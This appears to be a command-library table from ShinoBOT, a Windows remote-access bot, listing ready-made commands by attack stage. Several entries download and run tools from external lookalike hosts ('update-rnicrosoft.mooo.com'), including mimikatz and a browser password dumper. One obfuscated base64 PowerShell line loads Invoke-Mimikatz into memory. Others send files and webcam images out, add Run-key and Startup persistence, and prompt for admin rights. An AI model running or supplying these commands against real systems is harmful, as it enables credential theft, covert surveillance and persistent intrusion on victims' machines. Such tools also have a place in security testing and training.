ID | NAME |
---|---|
CATEGORY | COMMAND |
CREATED | DESCRIPTION |
14 | Download a file |
Add Weapon | powershell (new-object System.Net.WebClient).DownloadFile('%PARAMETER1%' , '%TEMP%\temp.dat'); |
2015-03-23 13:27:29(9y 39w) | Download a file from the specified URL. PARAMETER (Must) -- URL e.g.)http://shinosec.com/ |
35 | Download PsExec |
Add Weapon | powershell (new-object System.Net.WebClient).DownloadFile('http://update-rnicrosoft.mooo.com/files/85df66b931cfbfb0_PsExec.exe','%TEMP%\pse.exe'); dir %TEMP%\pse.exe |
2016-08-07 20:53:09(8y 19w) | Download PsExec (v2.11) https://technet.microsoft.com/en-us/sysinternals/psexec.aspx NO PARAMETER |
13 | Upload a file |
Data Exfiltration | powershell [convert]::ToBase64String((Get-Content %PARAMETER1% -Encoding byte)) |
2015-03-23 12:45:06(9y 39w) | Upload a client file to this server. PARAMETER (Must) --- File Path e.g.) C:\Users\Administrator\Desktop\secret.doc |
20 | Get Domain Admins Name |
Internal Recon | net group "Domain Admins" /domain |
2015-04-03 11:38:57(9y 37w) | Get the domain administrator (member of Domain Admins group). NO PARAMETER |
21 | Get Local Administrators Name |
Internal Recon | net localgroup "Administrators" |
2015-04-03 11:41:45(9y 37w) | Get the local administrators account name. |
23 | Get the Neighbour IP Address |
Internal Recon | arp -a |
2015-04-04 15:18:31(9y 37w) | Get the neighbour PC's IP Address using the ARP table. NO PARAMETER |
26 | Get the Windows Password with Mimikatz |
Internal Recon | powershell (new-object System.Net.WebClient).DownloadFile('http://shinomal.mooo.com/files/6fdc6cf5e9c53aa2_mimikatz.exe' , '%TEMP%\mimikatz.exe'); %temp%\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit | findstr Password |
2015-04-04 15:31:03(9y 37w) | Download mimikatz (http://blog.gentilkiwi.com/mimikatz) and execute it. NO PARAMETER Administrator Rights required. |
34 | Steal Browser Password with bpd.exe |
Internal Recon | powershell (new-object System.Net.WebClient).DownloadFile('http://update-rnicrosoft.mooo.com/files/994b8d282016bc21_BrowserPasswordDump.exe' , '%TEMP%\bpd.exe'); %TEMP%\bpd.exe |
2016-08-07 20:32:22(8y 19w) | Steal the password stored by browser. NO PARAMETER |
36 | CAPSLOCK Dance |
Joke | echo Set wshShell =wscript.CreateObject("WScript.Shell") > capslock.vbs echo do >> capslock.vbs echo wscript.sleep 1000 >> capslock.vbs echo wshshell.sendkeys "{CAPSLOCK}" >> capslock.vbs echo loop >> capslock.vbs wscript capslock.vbs |
2016-08-11 02:14:28(8y 18w) | Toggle the Capslock key repeatedly. Kill the process wscript.exe to stop this nightmare. Command example) taskkill /F /IM wscript.exe NO PARAMETER |
37 | Speech |
Joke | echo Dim message, sapi > speech.vbs echo message="%PARAMETER1%" >> speech.vbs echo Set sapi=CreateObject("sapi.spvoice") >> speech.vbs echo sapi.Speak message >> speech.vbs wscript speech.vbs |
2016-08-11 03:11:19(8y 18w) | Speech the specified text. PARAMETER (Mandantory) The text you want to speech. |
38 | Open CD tray |
Joke | echo Set oWMP = CreateObject("WMPlayer.OCX.7" ) > cdtray.vbs echo Set colCDROMs = oWMP.cdromCollection >> cdtray.vbs echo if colCDROMs.Count >= 1 then >> cdtray.vbs echo do >> cdtray.vbs echo For i = 0 to colCDROMs.Count - 1 >> cdtray.vbs echo colCDROMs.Item(i).Eject >> cdtray.vbs echo Next ' cdrom >> cdtray.vbs echo For i = 0 to colCDROMs.Count - 1 >> cdtray.vbs echo colCDROMs.Item(i).Eject >> cdtray.vbs echo Next ' cdrom >> cdtray.vbs echo loop >> cdtray.vbs echo End If >> cdtray.vbs wscript cdtray.vbs |
2016-08-11 07:45:58(8y 18w) | Open the CD tray repeatedly. Kill the process wscript.exe to stop this nightmare. Command example) taskkill /F /IM wscript.exe NO PARAMETER |
15 | Free Command |
Misc | |
2015-03-23 14:42:46(9y 39w) | There is no command, so you can use the parameter as the command without having this in the job repository. PARAMETER (Must) --- Command e.g) ipconfig .all |
18 | Capture Web Cam |
Misc | powershell (new-object System.Net.WebClient).DownloadFile('http://shinomal.mooo.com/files/3ebf375ce9a33d41_CommandCam.exe' , '%TEMP%\CommandCam.exe'); %TEMP%\CommandCam.exe /filename %temp%\image.bmp /quiet /delay %PARAMETER1%1 powershell [convert]::ToBase64String((Get-Content %TEMP%\image.bmp -Encoding byte)) |
2015-04-03 08:51:49(9y 37w) | Download CommandCam: https://batchloaf.wordpress.com/commandcam/ Execute it to take a picture. Then upload the picture. PARAMETER (Option) -- Delay before taking the photo in centisec. e.g.) 1000 It means 10 seconds. |
22 | Auto Start Using Startup Folder |
Persistence | copy %PARAMETER1% %userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ |
2015-04-03 16:04:55(9y 37w) | Download the newest ShinoBOT to the startup folder. PARAMETER (Must) -- File name e.g.)ShinoBOT.exe |
43 | Auto Start With Run registry |
Persistence | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v ShinoBOT /d %PARAMETER1% |
2016-10-25 08:10:14(8y 8w) | Add a registry key to start ShinoBOT after OS reboot. You have to specify the path of ShinOBOT. If you don't know, use "cd" command to check the current directory. PARAMETER(Must) -- ShinoBOT Path (absolute) e.g.)C:\User\username\ShinoBOT.exe |
41 | Run As Administrator |
Privilege Escalation | powershell Start-Process %PARAMETER1% -Verb RunAs |
2016-09-14 05:16:52(8y 13w) | Same as "Run As Administrator". If UAC is enabled, a popup will appear. PARAMETER(Must) -- Executable path e.g.)%TEMP%\ShinoBOT.exe |
1 | Get Hostname (Default) |
System Information | hostname |
2015-03-20 09:48:18(9y 39w) | Get host name. |
2 | Get User Name / Domain Name (Default) |
System Information | whoami |
2015-03-20 09:53:36(9y 39w) | Get the user name. PARAMETER (Optional) --- parameter of whoami command e.g) /ALL for details /LOGINID for SID /PRIV to enum the user priviledge |
3 | Get local IP Address (Default) |
System Information | ipconfig |
2015-03-20 09:56:36(9y 39w) | Get the local IP Address from ipconfig. NO PARAMETER |
4 | Get Current Directory (Default) |
System Information | cd |
2015-03-20 09:59:18(9y 39w) | Get current directory. NO PARAMETER |
10 | Screenshot (Default) |
System Information | SBOTshot powershell [convert]::ToBase64String((Get-Content %TEMP%\SBOTshot -Encoding byte)) |
2015-03-23 08:49:56(9y 39w) | Take a screen shot. NO PARAMETER. |
12 | Get Windows Version (Default) |
System Information | ver |
2015-03-23 09:35:31(9y 39w) | Get the Windows version using command ver. |
16 | Get System Info Details (Default) |
System Information | systeminfo |
2015-03-24 01:54:52(9y 39w) | Get the hardware detail, NIC information, hotfix applied. NO PARAMETER |
19 | Get Time Zone |
System Information | tzutil /g |
2015-04-03 11:35:40(9y 37w) | Get Time Zone by tzutil command. NO PARAMETER |
24 | Get the File List |
System Information | dir /a:-d /b |
2015-04-04 15:21:10(9y 37w) | Get the file list (not directory). PARAMETER -- Folder Path e.g.)C:\Users If no parameter is specified, the current directory will be used. |
25 | Get the Folder List |
System Information | dir /a:d /b |
2015-04-04 15:22:35(9y 37w) | Get the folder list (not file). PARAMETER -- Folder Path e.g.)C:\Users If no parameter is specified, the current directory will be used. |
33 | Get Proxy Settings |
System Information | reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer |
2015-04-24 05:25:55(9y 34w) | NO PARAMETER |
39 | Invoke Mimikatz |
System Information | powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AUwBoADEAbgAwAGcAMQAvAFAAbwBzAHQALQBDAG8AbQBwAHIAbwBtAGkAcwBlAGQALQBUAG8AbwBsAHMALwBtAGEAcwB0AGUAcgAvAGkAbQAuAHAAcwAxACcAKQA7ACAAJABvAHUAdABwAHUAdAA9AEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6ACAALQBEAHUAbQBwAEMAcgBlAGQAcwA7ACAAVwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAkAG8AdQB0AHAAdQB0AA== |
2016-09-12 14:50:50(8y 14w) | Get Windows passwords by Mimikatz injected into memory; no file access. NO PARAMETER *Administration Rights required. |
40 | Ask Admin Rights by UAC |
System Information | powershell Start-Process %PARAMETER1% -Verb runAs |
2016-09-12 14:55:15(8y 14w) | Get the Administration Right by UAC. PARAMETER(Must) -- File Path e.g.)C:\temp\ShinoBOT.exe |
44 | Check Login User |
System Information | query user |
2016-10-25 08:34:22(8y 8w) | Check the existing user session, login time. NO PARAMETER |